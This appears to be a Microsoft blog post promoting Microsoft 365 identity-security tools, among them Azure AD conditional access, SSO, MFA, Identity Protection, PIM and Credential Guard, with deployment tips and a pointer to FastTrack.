Microsoft 365 security solutions help you protect users and corporate accounts. By making identity the control plane, Microsoft 365 offerings manage identities as the first step to providing access to corporate resources and restricting users who are high risk. Tools like single sign-on (SSO), Multi-Factor Authentication (MFA), and Windows 10 Hello for Business help you secure access. Additionally, there are actions you can take if an identity is compromised and ways to lock down or wipe devices to protect sensitive data in case of loss or theft.

How do I provide secure access for my users?

Managing identities is the first step in protecting your environment. You can provision user identities through Azure Active Directory (Azure AD) and then connect to your on-premises Active Directory, allowing you to centralize identities for each user. Then you can set conditional access policies in Azure AD (Figure 1) for users in your organization. Conditional access policies allow you to control how users access cloud apps. You can set conditions that restrict access based on sign-in risk, user location, or client app, as well as only allowing access to managed devices. Start by implementing recommended identity access policies.

Managing user access is your next step. Azure AD SSO lets you manage authentication across devices, cloud apps, and on-premises apps with one user sign-in. Once you enable SSO, your employees can access resources in real-time on any device in addition to confidential or sensitive work documents away from the office. Next, deploy MFA in Azure AD to reauthenticate high-risk users, and take automated action to secure your network.

Figure 1. Set user policies using Azure AD conditional access.

Finally, encourage your employees to use Windows Hello for Business. Its a security feature that allows users unlock their device using their PCs camera, PIN, or their fingerprint.

How do I ensure that my employees credentials are not compromised?

Whats needed is a multi-layered approach to identity protection that goes beyond passwords and starts to identify risk even before a password is entered.

Early and active monitoring of potential threats is essential. With Azure AD Identity Protection, you get an overview of risk and vulnerabilities that may be affecting your organizations identities. You can then set up risk-based conditional access policies to automatically mitigate threats. Risk-based conditional access uses machine learning to identify high-risk users. For example, a user may be flagged based on unfamiliar locations or failed sign-ins from the same IP address. Once flagged, a user can be required to use MFA in Azure AD or be blocked altogether (Figure 1).

Another useful monitoring tool is Azure AD Privileged Identity Management (PIM). With Azure AD PIM, you can monitor admin access to resources and minimize the number of people who have access to them. By continuously monitoring these high access points, you limit vulnerabilities. You can configure Azure AD PIM in the Azure portal to generate alerts when theres suspicious or unsafe activity in your environment and then recommend mitigation strategies.

Along with monitoring, Microsoft 365 security solutions offer tools to better protect a users credentials. Windows Defender Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them, thus helping prevent unauthorized access to these secrets which can lead to credential theft attacks.

Deployment tips from the experts

Start by managing user identities as your control plane. Provision your user identities through Azure AD and use Azure AD Connect to integrate identities across Azure AD and your on-premises AD. Enable MFA for all administrators, set conditional access policies, and initiate SSO.

Manage your devices from the cloud. Managing employee devices remotely engenders productivity and bolsters security. Deploy Microsoft Intune as your mobile device manager for company- and employee-owned devices.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the Protect your users and their identity white paper. You can find additional security resources on Microsoft.com.

More blog posts from this series: